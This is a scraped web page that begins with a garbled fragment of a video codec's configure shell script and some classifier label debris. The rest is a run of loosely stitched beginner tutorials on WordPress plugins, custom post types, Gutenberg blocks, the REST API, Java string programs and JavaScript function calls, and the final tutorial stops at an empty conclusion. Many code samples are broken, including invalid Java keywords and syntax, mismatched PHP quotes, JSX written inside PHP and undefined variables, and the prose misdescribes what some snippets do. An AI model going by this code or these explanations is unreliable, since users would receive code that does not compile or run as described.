The WordPress REST API, combined with the power of WP Hooks, opens up endless possibilities for developers looking to create innovative and feature-rich applications. By following this guide, you’ve gained a solid foundation in utilizing these tools effectively.
Most Useful GIT Q&A Commands: Mastering Version Control
Git, a distributed version control system, has revolutionized the way developers collaborate and manage their codebases. Whether you’re a seasoned developer or just starting on your coding journey, understanding and mastering Git commands is crucial for efficient version control and seamless collaboration. In this article, we’ll explore the most useful GIT Q&A commands that will empower you to navigate the world of version control like a pro.
What is GIT Repository ?
A Repository is a file structure where git stores all the project based files. Git can either stores the files on the local or the remote repository.
What does Git Clone do ?
The command create a copy(or clone) of an existing git repository. Generally, It is used to get copy of the remote repository to the local repository.
git_clone
What does the command git config do ?
The git config Command is a convenient way to set configuration options for defining the behavior of the repository, User information and preferences, git installation-based configurations, and many such things.
Ex : To setup your name and email address before using git commands, we can run the below commands.
git config –global user.name “<<your_name>>”
git config –global user.email “<<your_email>>”
What is conflict & how you will solve this ?
Git Usually handles features merges automatically but sometimes while working in a team environment, there might be cases of conflicts such as :
1. When two separate branches have changes to the same line in a file.
2. A file is deleted in one branch but has been modified in the other.
These conflicts have to be solved manually after discussion with the team as git will not be able to predict what and whose changes have to be given precedence.
What is the functionality of git is-tree ?
This command returns a tree object representation of the current repository along with the mode and the name of each item and SHA-1 value of the blob.
What does git status command do ?
git status Command is used for showing the difference between the working directory and the index which is helpful for understanding git in-depth and also keep track of the tracked and non tracked changes.
Define “Index” ?
Before making commits to the changes done, the developer is given provision to format and review the files and make innovations to them. All these are done in the common area which is known as ‘Index’ or ‘Staging Area’.
In the above image, the “staged” status indicates the staging area and provides an
opportunity for the people to evaluate changes before committing them.
What does git add command do ?
• This Command adds files and changes to the index of the existing directory.
• You Can add all changes at once using git add. Command.
• You can add files one by one specifically using git add <filename> command.
• You can add contents of a particular folder by using git add / <folder_name> / Command.
How you will create a git Repository ?
• Have git installed in your system.
• In order to create a git repository, create a folder for the project and then run git init .
• This will create a .git file in the project folder which indicates that the Repository has been created.
What is git Stash ?
Git Stash can be used in cases where we need to switch in between branches and at the same time not wanting to lose edits in the current branch. Running the git stash command basically pushes the current working directory for other tasks.
What is the command used to delete a branch ?
• To delete a branch we can simply use the command git branch -d [head].
• To delete a branch locally, we can simply run the command : git branch -d <local_branch_name>
• To delete a branch remotely, run the command: git push origin –delete <remote_branch_name>
• Deleting a branching scenario occurs for multiple reasons. One Such Reason is to get rid of the feature branches once it has been merged into the development branch.
What are difference between Command git remote and git clone ?
git remote Command creates an entity in git config that specifies a name for a particular URL . whereas git clone creates a new git repository by copying an existing one located at the URL.
What is git Stash apply Command do ?
• git stash apply command is used for bringing the work back to the working directory from the stack where the changes were stashed using git stash command.
• This helps the developers to resume their work where they had last left their work before switching to other branches.
How git pull & git merge is connected to each other ?
git pull = git fetch + git merge
What is difference between Pull request & branch ?
Pull Request
This process is done when there is a need to put a developer’s change into another person’s code branch.
Branch
A branch is nothing but a separate version of the code.
Why do we not call git “pull request” as “push request” ?
Push request is termed so because it is done when the target repository requests us to push our changes to it.
Pull request is named as such due to the fact that the repo requests the target repository to grab(or pull) the changes from it.
What is commit object ?
A commit object consists of the following components :
a : A set of files that represents the state of a project at a given point in time.
b : Reference to parent commit objects.
c : A 40 character String termed as SHA-1 name uniquely identifies the commit object.
What command helps us know the list of branches merged to master ?
git branch –merged helps to get the list of the branches that have been merged into the current branch.
Note : git branch –no-merged lists the branches that have not been merged to the current branch.
What are the functionalities of git reset –mixed and git merge –abort ?
git reset –mixed command is used for undoing changes of the working directory and the git index.
git merge –abort command is used for stopping the merge process and returning back to the state before the merging occurred.
Conclusion
Congratulations! You’ve taken a significant step towards mastering Git. By understanding and utilizing these essential Git Q&A commands, you’ve equipped yourself with the tools to navigate version control confidently and collaborate seamlessly with fellow developers.
Most Common Programing Language Q&A asked in Interviews !
In today’s competitive job market, landing a programming job requires more than just technical skills. Interviewers often delve into the depths of programming languages to assess a candidate’s expertise. Whether you’re a seasoned developer or a fresh graduate, having a solid grasp of the most common programming language questions and answers can give you an edge. In this article, we’ll explore the frequently asked programming language questions in interviews and provide comprehensive answers to help you ace your next interview.
As the tech industry continues to evolve, programming languages remain at the core of software development. Interviews are a critical juncture where employers assess candidates’ abilities to solve problems, write efficient code, and communicate effectively. Let’s delve into the significance of programming language questions in interviews and explore some of the most commonly asked questions.
Importance of Programming Language Questions in Interviews
In interviews, programming language questions serve multiple purposes. They assess your technical prowess, problem-solving skills, and familiarity with industry-standard languages. Moreover, they offer insight into your approach to coding challenges and your ability to adapt to different programming paradigms.
Write a Program to Reverse a String ?
Visit Program Page to get this program.
What is mean by OPPS ?
OOPS is Object Oriented Programming Structure. OOPS is a method of implementation in which programs are organized as collection of objects, class and methods.
What is mean Class & Method ,Object ?
Class
Class is a collection of objects and methods • Class contains attributes(variables and methods) that are common to all the objects created in a class.
Method
Method defines the set of action to be performed.
Object
Object is the run time memory allocation. • Using object we call any methods.
What is mean by Encapsulation ?
It is the structure of creating folders.It wraps the data and code acting on data together in to a single unit.
Ex: encapsulation is POJO class. It is otherwise called Data hiding.
What is the main use of Scanner class ?
To get the inputs from the user at the run time.
What are the methods available in Scanner Class ?
• nextByte();
• nextShort();
• nextInt();
• nextLong();
• nextFloat();
• nextDouble();
• next().charAt(0);
• next();
• nextLine();
• nextBoolean();
What is Method overloading and overriding ?
Method overriding is used to provide the specific implementation of the method that is already
provided by its super class. Method overloading is performed within class. Method overriding occurs in
two classes that have IS-A (inheritance) relationship. In case of method overloading, parameter must be
different.
What is mean by polymorphism ?
Poly-many-Morphism-forms. Taking more than one forms is called polymorphism or one task implemented in many ways.
What is mean by inheritance ?
Accessing one class Properties in another class without multiple object creation. It avoids time and memory wastage. • It ensures code reusability.
What are the ways to access the methods /data from another class ?
We can access the another class methods either by creating object or using extends keyword.
What is mean by access specifier ?
It defines the scope or level of access for variables,methods and classes
What are the difference between public and protected ?
Public: It is global level access( same package + different package).
Protected: can access Inside package ( object creation + extends )
What is mean by Abstraction ?
Hiding the implementation part or business logic is called abstraction.
What are the types of Abstraction ?
• Partially abstraction(using abstract class).
• Fully abstraction(using interface).
Can we create Object for Abstract class ?
No, we cant create object for abstract class.
What is mean by Interface ?
It will support only abstract method(without business logic), won’t support non abstract method(method with business logic )
In interface “public abstract” is default.
using “implements” keyword we can implement the interface in a class where we can write the business logic for all unimplemented methods.
What are the difference between Abstract and Interface ?
Abstract class: Using Abstract class,we can acheive partial abstraction.
• It support both abstract method and non-abstract method.
• using “extends” keyword you can inherit an abstract class.
• For any abstract method we need to mention “public abstract”.
Interface: Using interface,we can acheive full abstraction.
• It supports only abstract method.
• It is using “implements” keyword.
• “public Abstract” is default, no need to mention it explicitly.
What is mean by String?
• Collection of characters or words enclosed within double quotes is called as String.
• String is a class in java
• String is index based
• Example : “greenstechnology”.
|
__label__pos
| 0.965825 |
Can you create page-turning eBooks based on compact CHM pages?
The CHM documents are always compact, how can I show the compact pages with a much stunning flash effect?
To show your CHM pages with stunning page-flipping effect, Flip CHM could be the best choice.
The operations are very easy:
1. Click "Import CHM" button, choose your CHM file, you can check the options like "Import links", "Import bookmark" and "Enable Search" in the import interface;
2. In the main template setting interface, you can choose template, define book properties, sound, toolbar and links, click "Apply Change" after all settings;
3. Click "Convert To Flipping Book" to choose output format from HTML, ZIP and EXE, you can also burn the created flipbook to CD/DVD.
Free download the trial version to have a try first.
More questions about Flip CHM
|
__label__pos
| 0.981443 |
On screen buttons disappear
I'm working on a course and we have a custom GUI so are not using the Storyline Player. Instead, we have our own Next and Back buttons. They aren't anything fancy - just a graphic button with a hover state and they go to the next or previous slide.
We had the buttons at the Master slide level and were finding that they would disappear when revisiting some slides. I change some settings and moved the buttons to each individual page rather than the master, but it is still happening. Sometimes it's fine, and other times one of the buttons doesn't display when we revisit the page. Has anyone else had this issue and found a solution?
16 Replies
Ashley Terwilliger
Hi Kelley,
Are there triggers set to hide the buttons or change their state based on slide conditions or based on the user answering the question? Are they navigated to a layer after answering, and maybe the buttons are hidden on the layer?
Without seeing what you've got set up, it's hard to know for certain what elements are contributing to this behavior. Are you able to share your .story file here with us to take a look at?
Ashley Terwilliger
Hi Kelley,
Are there triggers set to hide the buttons or change their state based on slide conditions or based on the user answering the question? Are they navigated to a layer after answering, and maybe the buttons are hidden on the layer?
Without seeing what you've got set up, it's hard to know for certain what elements are contributing to this behavior. Are you able to share your .story file here with us to take a look at?
Kelley Conrad
I'd have to ask the client if it would be okay to share it.
To answer your questions, the buttons are not hidden on the layer and it happens inconsistently. I can go back once and the back button is gone, then I can go back again and the back button is there but the next button is gone. Sometimes both disappear, sometimes both are there. The only condition associated with the buttons is to not have them jump to the next page or show the hover state if they are in a disabled state.
Kelley Conrad
No - they are all set to show until the end of the timeline. They were initially on the master slide and set to show until the end of the slide with no fades. They work perfectly on most slides but not all the time. I took them off the master slide and put them on each slide individually, but it still happens intermittently unless I set the slides where there is an issue to Reset to Initial. It seems to only happen on the slides where there are layers, a question, etc, but it doesn't happen on all of them and it doesn't happen the same way every time. I have attached a PDF with some screen shots. I had to remove all of the client info, but it should give an idea of what happens,
Stephanie Harnett
Have you tried removing the triggers that are controlling states and leaving just triggers that control navigation for those buttons? The states should automatically occur without additional trigger logic. If you have and are still having problems, if you upload a sample containing just 2 slides, I can take a quick peek at it.
Stephanie Harnett
Here's an example that seems to work. The first slide has a radio button and the next button is disabled (grey). When you click the radio button the next button changes to selected (orange). Clicking it takes you to slide 2. Same deal here. Clicking back shows the button correct in the correct state and moving ahead the buttons work on slide 2.
Kelley Conrad
Here's the file with a few pages. If I set the pages to Reset to Initial, it resolves the problem. I didn't set up the custom GUI so I don't have all of the graphic elements/states as .png files to play around with. I removed the audio and the content pages are blank, but you can see the buttons appear and disappear, especially on the slide with the layers, when you go back and forth.
Stephanie Harnett
Hi Kelley. I removed all of the unnecessary triggers (those controlling the various states). I added a default state of hover (instead of custom over state) to each button. I set all slides to resume saved state instead of reset. I added a blank slide at the end so you can see that when the (page 30) slide comes up with the disable next button, that the state doesn't change and the user can't move forward without the need for triggers to control that - it's built into the disabled state, just like hover is built into the hover state.
|
__label__pos
| 0.920281 |
You’re sitting only inches away from a potentially huge vulnerability. Your computer’s webcam could create an opening for a hacker to gain access and learn compromising information.
Download the FREE Webcam Security Guide below!
Why do hackers want to spy on you?
The most common way for hackers to take control of your webcam and spy on you is through malware, which is inadvertently downloaded through links or emails that you click on. The hacker’s goal is to spy on your behavior and learn information they can use to make money.
One way they can do this is by capturing sensitive photos and using them to blackmail you, which is getting more and more possible as video quality is always improving. Hackers can also watch you to learn about your identity, financial information, or habits, which can then be sold or used to steal your identity. Finally, gaining access to your webcam can also give hackers an opportunity to infect your computer with more malware or viruses.
It’s just a camera. Is it really that vulnerable?
YES! In our post-pandemic world, many vulnerable webcams today are in residences, which hackers can easily get into through smart home networks. Today’s Internet of Things (IoT) brings devices together on the same network, making life much more convenient, but also opening individuals and families up to big risks.
Through a vulnerability in your computer, your internet connection, or even your own actions, hackers can easily gain access. Do you remember the recent Ring doorbell incidents?
So how do you protect yourself?
While the threat is very real, it’s not hard to set up security measures that will protect you, your information, and your family (or business!). It’s important to recognize how a hacker can gain access. Just like in a building, there are multiple points of entry, or weaknesses, the hacker can try to exploit.
Your Computer
It’s very important to secure your physical computer with these simple steps:
1. Keep all software up to date so vulnerabilities are patched and each program has their latest cybersecurity measures.
2. Use a firewall (network security system) on your computer. Most modern computers have one built in.
3. Pay for security software like McAfee or Avast. Be wary of off-brand security software, though!
4. Cover your webcam with tape or a webcam cover as a safeguard in case you’re ever hacked.
Your Internet / WiFi
1. Secure your WiFi by creating a name and a UNIQUE password – don’t reuse passwords! Hackers love it when you do this.
2. Use a VPN (virtual private network) in addition to your other security controls. Some security software (like those above) will do this for you.
Your Actions
The next potential point of entry is YOU! You could be a vulnerability by clicking on a seemingly harmless link or downloading something unknown. Staying skeptical is your best defense against hacking and malware.
1. Use different passwords for all websites and update them frequently.
2. Don’t chat with strangers online or provide login info to people you don’t know.
3. Don’t click on odd-looking links and don’t ever download something unless you know exactly what it is or it came from a trusted, verified source.
4. Don’t allow strangers access to your computer (even for repairs) unless they’re fully vetted and reputable.
Some of these take two seconds and some are important habits to develop. Following these TCecure tips will protect you against potential threats across all your home devices.
If you feel you’ve been the victim of a webcam hack, change your passwords, follow the above steps, and run a security scan on your computer to remove the malware.
Get the FREE Webcam Security Guide below! Email us for cybersecurity assistance: [email protected]!
Sources: NortonAvast
Download the Webcam Security Guide!
* indicates required
Share This Story, Choose Your Platform!
|
__label__pos
| 0.978196 |
cgma
OCCLoop Class Reference
#include <OCCLoop.hpp>
Inheritance diagram for OCCLoop:
LoopSM TopologyBridge
List of all members.
Public Member Functions
OCCLoop (TopoDS_Wire *theLoop)
void coedges (DLIList< OCCCoEdge * > coedges)
DLIList< OCCCoEdge * > coedges ()
OCCCoEdgeremove_coedge (OCCCoEdge *coedge)
void disconnect_all_curves ()
TopoDS_Wire * get_TopoDS_Wire ()
void set_TopoDS_Wire (TopoDS_Wire loop)
virtual LoopType loop_type ()
virtual ~OCCLoop ()
virtual CubitBox bounding_box () const
virtual GeometryQueryEngineget_geometry_query_engine () const
virtual void append_simple_attribute_virt (const CubitSimpleAttrib &)
virtual void remove_simple_attribute_virt (const CubitSimpleAttrib &)
virtual void remove_all_simple_attribute_virt ()
virtual CubitStatus get_simple_attribute (DLIList< CubitSimpleAttrib > &)
virtual CubitStatus get_simple_attribute (const CubitString &name, DLIList< CubitSimpleAttrib > &)
virtual void get_parents_virt (DLIList< TopologyBridge * > &)
virtual void get_children_virt (DLIList< TopologyBridge * > &)
CubitStatus update_OCC_entity (BRepBuilderAPI_ModifyShape *aBRepTrsf, BRepAlgoAPI_BooleanOperation *op=NULL)
Static Public Member Functions
static CubitStatus update_OCC_entity (TopoDS_Wire &old_loop, LocOpe_SplitShape *sp)
Private Attributes
TopoDS_Wire * myTopoDSWire
DLIList< OCCCoEdge * > myCoEdgeList
Detailed Description
Definition at line 37 of file OCCLoop.hpp.
Constructor & Destructor Documentation
OCCLoop::OCCLoop ( TopoDS_Wire * theLoop)
Definition at line 55 of file OCCLoop.cpp.
{
myTopoDSWire = theWire;
}
OCCLoop::~OCCLoop ( ) [virtual]
Definition at line 66 of file OCCLoop.cpp.
{
disconnect_all_curves();
if (myTopoDSWire)
{
myTopoDSWire->Nullify();
delete (TopoDS_Wire*)myTopoDSWire;
myTopoDSWire = NULL;
}
}
Member Function Documentation
Implements TopologyBridge.
Definition at line 139 of file OCCLoop.cpp.
{
}
CubitBox OCCLoop::bounding_box ( void ) const [virtual]
Definition at line 225 of file OCCLoop.cpp.
{
CubitBox box;
for (int i = myCoEdgeList.size(); i > 0; i--)
{
DLIList<OCCCoEdge*> coedges = myCoEdgeList;
OCCCoEdge* coedge = coedges.get_and_step();
box |= coedge->curve()->bounding_box();
}
return box;
}
void OCCLoop::coedges ( DLIList< OCCCoEdge * > coedges) [inline]
Definition at line 43 of file OCCLoop.hpp.
Definition at line 45 of file OCCLoop.hpp.
{return myCoEdgeList;}
Definition at line 118 of file OCCLoop.cpp.
void OCCLoop::get_children_virt ( DLIList< TopologyBridge * > & children) [virtual]
Implements TopologyBridge.
Definition at line 214 of file OCCLoop.cpp.
Implements TopologyBridge.
Definition at line 243 of file OCCLoop.cpp.
void OCCLoop::get_parents_virt ( DLIList< TopologyBridge * > & parents) [virtual]
Implements TopologyBridge.
Definition at line 185 of file OCCLoop.cpp.
{
OCCQueryEngine* oqe = (OCCQueryEngine*) get_geometry_query_engine();
OCCSurface * surf = NULL;
DLIList <OCCSurface* > *surfs = oqe->SurfaceList;
TopTools_IndexedDataMapOfShapeListOfShape M;
for(int i = 0; i < surfs->size(); i++)
{
surf = surfs->get_and_step();
TopExp::MapShapesAndAncestors(*(surf->get_TopoDS_Face()),
TopAbs_WIRE, TopAbs_FACE, M);
if (!M.Contains(*(get_TopoDS_Wire())))
continue;
const TopTools_ListOfShape& ListOfShapes =
M.FindFromKey(*(get_TopoDS_Wire()));
if (!ListOfShapes.IsEmpty())
{
TopTools_ListIteratorOfListOfShape it(ListOfShapes) ;
for (;it.More(); it.Next())
{
TopoDS_Face Face = TopoDS::Face(it.Value());
int k = oqe->OCCMap->Find(Face);
parents.append_unique((OCCSurface*)(oqe->OccToCGM->find(k))->second);
}
}
}
}
Implements TopologyBridge.
Definition at line 176 of file OCCLoop.cpp.
{
return CUBIT_FAILURE;
}
Implements TopologyBridge.
Definition at line 181 of file OCCLoop.cpp.
{ return CUBIT_FAILURE; }
TopoDS_Wire* OCCLoop::get_TopoDS_Wire ( ) [inline]
Definition at line 51 of file OCCLoop.hpp.
{return myTopoDSWire;}
virtual LoopType OCCLoop::loop_type ( ) [inline, virtual]
Implements LoopSM.
Definition at line 54 of file OCCLoop.hpp.
{return LOOP_TYPE_UNKNOWN;};
Implements TopologyBridge.
Definition at line 164 of file OCCLoop.cpp.
{
}
Definition at line 123 of file OCCLoop.cpp.
{
if(myCoEdgeList.remove(coedge))
return coedge;
return NULL;
}
Implements TopologyBridge.
Definition at line 151 of file OCCLoop.cpp.
{
}
void OCCLoop::set_TopoDS_Wire ( TopoDS_Wire loop)
Definition at line 77 of file OCCLoop.cpp.
{
if(myTopoDSWire && loop.IsEqual(*myTopoDSWire))
return;
if(myTopoDSWire && !loop.IsSame(*myTopoDSWire))
{
DLIList<OCCCoEdge*> coedges = this->coedges();
for(int i = 0; i < coedges.size(); i++)
{
OCCCoEdge* coedge = coedges.get_and_step();
OCCCurve* curve = CAST_TO(coedge->curve(), OCCCurve);
TopoDS_Edge *edge = curve->get_TopoDS_Edge( );
BRepTools_WireExplorer Ex;
CubitBoolean found = false;
for (Ex.Init(loop); Ex.More(); Ex.Next())
{
TopoDS_Shape crv = Ex.Current();
if(edge->IsPartner(crv))
{
found = true;
break;
}
}
if (!found)
curve->remove_loop(this);
}
}
TopoDS_Wire* the_wire = new TopoDS_Wire(loop);
if(myTopoDSWire)
delete (TopoDS_Wire*)myTopoDSWire;
myTopoDSWire = the_wire;
}
CubitStatus OCCLoop::update_OCC_entity ( BRepBuilderAPI_ModifyShape * aBRepTrsf,
BRepAlgoAPI_BooleanOperation * op = NULL
)
Definition at line 254 of file OCCLoop.cpp.
{
assert(aBRepTrsf != NULL || op != NULL);
TopoDS_Shape shape;
CubitBoolean need_update = CUBIT_TRUE;
BRepBuilderAPI_Transform* pTrsf = NULL;
BRepBuilderAPI_GTransform* gTrsf = NULL;
if(aBRepTrsf)
{
pTrsf = (BRepBuilderAPI_Transform*)aBRepTrsf;
shape = pTrsf->ModifiedShape(*get_TopoDS_Wire());
if(shape.IsNull())
{
gTrsf = (BRepBuilderAPI_GTransform*)aBRepTrsf;
shape = gTrsf->ModifiedShape(*get_TopoDS_Wire());
}
}
else
{
TopTools_ListOfShape shapes;
shapes.Assign(op->Modified(*get_TopoDS_Wire()));
if(shapes.Extent() == 0)
shapes.Assign(op->Generated(*get_TopoDS_Wire()));
if(shapes.Extent())
shape = shapes.First();
else if (op->IsDeleted(*get_TopoDS_Wire()))
;
else
need_update = CUBIT_FALSE;
}
//set the curves
for (int i = 1; i <= myCoEdgeList.size(); i++)
{
OCCCurve *curve = CAST_TO(myCoEdgeList.get_and_step()->curve(), OCCCurve);
curve->update_OCC_entity(aBRepTrsf, op);
}
TopoDS_Wire loop;
if (need_update)
{
loop = TopoDS::Wire(shape);
OCCQueryEngine::instance()->update_OCC_map(*myTopoDSWire, loop);
}
return CUBIT_SUCCESS;
}
CubitStatus OCCLoop::update_OCC_entity ( TopoDS_Wire & old_loop,
LocOpe_SplitShape * sp
) [static]
Definition at line 307 of file OCCLoop.cpp.
{
TopTools_ListOfShape shapes;
shapes.Assign(sp->DescendantShapes(old_loop));
assert(shapes.Extent() == 1);
TopoDS_Shape new_loop = shapes.First();
TopoDS_Shape shape_edge;
//set curves
BRepTools_WireExplorer Ex;
for(Ex.Init(old_loop); Ex.More();Ex.Next())
{
TopoDS_Edge edge = Ex.Current();
shapes.Assign(sp->DescendantShapes(edge));
if(shapes.Extent() > 1)
{
shape_edge = shapes.First();
OCCQueryEngine::instance()->update_OCC_map(edge, shape_edge);
}
}
OCCQueryEngine::instance()->update_OCC_map(old_loop , new_loop );
return CUBIT_SUCCESS;
}
Member Data Documentation
Definition at line 122 of file OCCLoop.hpp.
TopoDS_Wire* OCCLoop::myTopoDSWire [private]
Definition at line 121 of file OCCLoop.hpp.
The documentation for this class was generated from the following files:
All Classes Namespaces Files Functions Variables Typedefs Enumerations Enumerator Friends Defines
|
__label__pos
| 0.979291 |
Aranir
By:
Aranir
[Ubuntu]: Can't open any port
October 23, 2014 4k views
I followed the following guide:
https://www.digitalocean.com/community/tutorials/how-to-set-up-a-firewall-using-ip-tables-on-ubuntu-12-04
and tried to open port 80, but I still have nothing open or listening:
netstat -plunt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 1051/mysqld
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 965/sshd
tcp6 0 0 :::22
The strangest thing is that I could connect to the server yesterday and today it isn't working anymore and the only thing I changed was to add a DNS entry on Digital Ocean.
Could this have anything to do with it?
I tried even to disable any protection with the following commands:
$ sudo iptables -X
$ sudo iptables -t nat -F
$ sudo iptables -t nat -X
$ sudo iptables -t mangle -F
$ sudo iptables -t mangle -X
$ sudo iptables -P INPUT ACCEPT
$ sudo iptables -P FORWARD ACCEPT
$ sudo iptables -P OUTPUT ACCEPT
but still only port 22 is accessible. What could be the reason for this?
2 comments
• Why have a firewall in the first place?
Your running daemons could still get exploited?
Make sure you know what you have running and on what ports. Secure those daemons which would be much better then implementing a firewall to allow traffic only to certain ports which are in essence the only ports that are actually being used anyway!
• netstat -plunt will only list ports that something is actively listening on. Do you have a web server listening on port 80? Is Apache or Nginx installed?
1 Answer
netstat -plunt should show you that the web server is trying to listen on port 80 even if it is blocked by the firewall. Make sure the server is running. If it's Apache, run:
service apache2 start
If it's Nginx, then:
service nginx restart
Have another answer? Share your knowledge.
|
__label__pos
| 0.98506 |
Request Validation
Introduction
Tyk can protect any Gateway incoming request by validating the request parameters and payload against a schema provided for that path’s request body in the OAS API Definition.
The clever part is that in this schema you can reference another schema defined elsewhere in the API Definition; this lets you write complex validations very efficiently since you don’t need to re-define the validation for a particular object every time you wish to refer to it.
Note
At this time Tyk only supports local references to schema within the same API Definition, but in future we aim to support schemas defined externally (via URL).
How it works
Request Validation works on operations. To enable request validations for the parameters, you must declare at least one parameter on an Open API operation:
"/pet/{petId}": {
"get": {
"summary": "Find pet by ID",
"operationId": "getPetById",
"parameters": [
{
"name": "petId",
"in": "path",
"description": "ID of pet to return",
"required": true,
"schema": {
"type": "integer",
"format": "int64"
}
}
],
...
}
}
If there is at least one parameter, that parameter will enable validation of parameters.
To configure Request Validation, which will check the body of each API request sent to the endpoint, follow these simple steps:
1. Define a schema for an application/json content type in the requestBody section of a path.
{
...
"paths":{
"/pet":{
"put":{
...
"requestBody":{
"description":"Update an existent pet in the store",
"content":{
"application/json":{
"schema":{
type: string
}
}
}
}
}
}
}
...
}
1. Enable validateRequest middleware within the operations section of the API definition, using the operationId to identify the specific endpoint for which validation is to be applied.
{
...
"paths":{
"/pet":{
"put":{
...
operationId: 'petput',
"requestBody":{
...
"content":{
"application/json":{
"schema":{
type: string
}
}
}
}
}
}
}
...
"x-tyk-api-gateway": {
...
"middleware": {
...
"operations": {
...
"petput": {
"validateRequest": {
"enabled": true
}
}
}
}
}
}
Using references to access shared schemas
You can define the validation schema directly within the requestBody of the path’s definition, or you can define it in the separate components.schemas section and include a relative reference within the requestBody. This allows you to re-use a schema across multiple paths.
//SCHEMA DEFINED WITHIN PATH DEFINITION
{
...
"paths":{
"/pet":{
"put":{
...
"requestBody":{
"description":"Update an existing pet in the store",
"content":{
"application/json":{
"schema":{
type: string
}
}
}
}
}
}
}
...
}
//SCHEMA DEFINED WITHIN COMPONENTS.SCHEMAS AND ACCESSED USING RELATIVE REFERENCE
{
...
"components": {
"schemas": {
"Pet": {
type: string
}
}
},
"paths":{
"/pet":{
"put":{
...
"requestBody":{
"description":"Update an existing pet in the store",
"content":{
"application/json":{
"schema":{
$ref: "#/components/Pet"
}
}
}
}
}
}
}
...
}
Automatically enable request validation
When importing an OAS API Definition or updating an existing Tyk OAS API Definition, validateRequest middleware can be automatically configured by Tyk for all the paths that have a schema configured, by passing validateRequest=true as a query parameter for the IMPORT or PATCH request respectively.
|
__label__pos
| 0.999934 |
Skip to content
Edge Router & BNG Optimisation Guide for ISPs
Last updated on 22 January 2024
It would be appreciated if you could help me continue to provide valuable network engineering content by supporting my non-profit solitary efforts. Your donation will help me conduct valuable experiments. Click here to donate now.
PSA: I’ve updated the CGNAT section with RouterOS v7 EIM-NAT config.
I will remove this ugly PSA in the future, when I clean up this article a bit.
This guide provides configuration instructions for MikroTik RouterOS, but the principles can be applied to other Network Operating Systems (NOSes) as well. The guide will be updated regularly as new technologies, use cases, and more efficient configurations are discovered.
Many ISPs around the globe use MikroTik RouterOS to provide access to their customers via BNGs over PPPoE and for various other roles such as edge routers. In this guide, I will explore common issues and solutions along with best practices.
This guide is also available on the APNIC Blog, however the version there is obselete. I recommend you follow the source here for the most up-to-date information.
A brief history of this project
• The configuration was first tested and deployed on AS135756 (small-sized ISP) with its proprietor Varun Singhania.
• In 2021-22, I tested the configuration further as a downstream customer on AS132559 (IP Transit provider & medium-sized ISP), where I was able to assess the impact and config changes both as an end-user and a consultant.
• From 2022 onwards, I test the configurations on my own network (AS149794), including the firewall rules, to ensure it would work in any environment as long as the instructions are followed. The tests confirmed that the configuration does not disrupt layer 4 protocols or cause problems for end-users in the last mile.
A few things to keep in mind
• RouterOS is based on the Linux Kernel. As of RouterOS v7.14 it still uses legacy iptables for packet filtering instead of nftables, which has a negative impact on performance.
• The guide will be focused on RouterOS v7 as it is the current version of RouterOS.
• This guide assumes the reader has a basic understanding of typical use cases and technologies/protocols used in an ISP/Telco production environment.
• This guide focuses on layer 2-4 configuration (and occasionally up to layer 7) by following various RFCs and BCOPs. It is not a network architecture guide, for which Kevin Myers’s guide is recommended.
• Most (virtually everything) on this article has been tested on RouterOS v7.12.1 (stable + 7.12.1 RouterBOARD firmware).
Basic Router Terminology and overview
• An edge or border router is an inter-AS router that is used for connecting different networks, such as transit, IXP, or PNIs.
• It is important to keep an edge router stateless i.e. without connection tracking (stateful firewall filter rules or NAT), to avoid performance issues and vulnerability to DDoS attacks.
• Do not use an edge router for customer delegation, as it will become stateful.
• Do not confuse an edge router with a Provider Edge router, which is an MPLS-specific terminology.
• A core router is not typically present in modern networks that follow a collapsed core topology.
• BNGs, also known as access layer routers, are used for customer delegation tasks such as PPPoE, DHCP, and CGNAT. They are stateful in nature. Some people may also refer to them as BRAS or NAS (Network Access Servers), all of which are synonyms in my opinion.
General Configuration Changes
Below are the general guidelines that should be applied on all MikroTik devices for optimal performance and security.
• Upgrade RouterOS and the RouterBOARD firmware to the latest stable (or long-term if available) v7 releases, Use this command to enable firmware auto upgrade: “/system routerboard settings set auto-upgrade=yes”. Remember to reboot the router twice after the RouterOS upgrade to ensure firmware gets automatically upgraded.
• Implement basic security measures, including reverse path filtering and enabling TCP SYN cookies, for which the latter two are found in IP>Settings.
• For rp-filter use loose mode when a device is behind asymmetric routing or when in doubt, use strict mode when a device is behind symmetric routing.
IPv6
IPv6 Router Advertisements (RA) are used for SLAAC and/or DHCPv6 and in MikroTik it is called Neighbor Discovery (ND) which is a bit confusing as ND is an umbrella encompassing various protocols and behaviours and not only RAs.
IPv6 RA (ND) is enabled by default for all interfaces on RouterOS. This should be disabled to prevent sending RAs randomly out of interfaces that you do not use SLAAC on and for security reasons such as preventing someone from receiving an IPv6 address by connecting a host to a specific port or VLAN along with reducing unnecessary BUM traffic in your network. We disable it using this command:
/ipv6 nd set [ find default=yes ] disabled=yes
You can enable IPv6 RA on a per-interface basis as and when required, i.e. if you set “advertise=yes” for an interface via IPv6>Address, then you need to configure RA/ND for that interface like the example below:
/ipv6 nd add interface=Management_VLAN
Interface Lists
Interface lists help us simplify firewall rule management by enabling us to refer to an entire list in a single rule instead of multiple rules for every interface.
An interface list should only contain layer 3 (L3) interfaces which is an interface with IP addressing attached to it, such as a physical port, L3 sub-interface VLAN, L3 bonding interface or GRE interface.
The following are basic guidelines for which lists to create and what should be included on those lists:
• WAN” interface list should contain those interfaces used for connecting to transit, PNI, IXP, upstream peering.
• LAN” interface list should contain those interfaces used for downstream connectivity to your retail customers or IP Transit customers etc. You should include “dynamic” interfaces to account for PPPoE clients on BNGs.
• Intra-AS” interface list should contain those interfaces used for connecting one device to another device within the same network such as redundant connectivity between two routers horizontally.
• Management” interface list should contain those interfaces used exclusively for management.
• Do not add bridge members individually into any list as they are purely Layer 2 (L2) interfaces.
It is however, important to note: When you are using bridges (which is discussed later in this article), the interface placements depend on how you set up the bridge – If you’re using a single bridge with physical/bonding interfaces as bridge members without any VLAN configuration, then the bridge will be a member of “LAN”. But if you are using VLANs on top of the bridge, then place the VLANs into their appropriate LAN/Intra-AS/Management list based on your local network topology. For example:
“Management VLAN” will be in the management list, or VLAN123 will be in the “intra-AS” or “LAN” list.
Figure-1 (LAN Include Dynamic)
Connection Tracking
• Disable connection tracking on the edge router and enable loose TCP tracking on all routers using the following commands:
“/ip firewall connection tracking set enabled=no”
“/ip firewall connection tracking set loose-tcp-tracking=yes”
• Use the recommended connection tracking timeout values to improve stability and performance, especially for UDP traffic like VoIP and gaming. If necessary, upgrade the router’s RAM to accommodate these values.
/ip firewall connection tracking
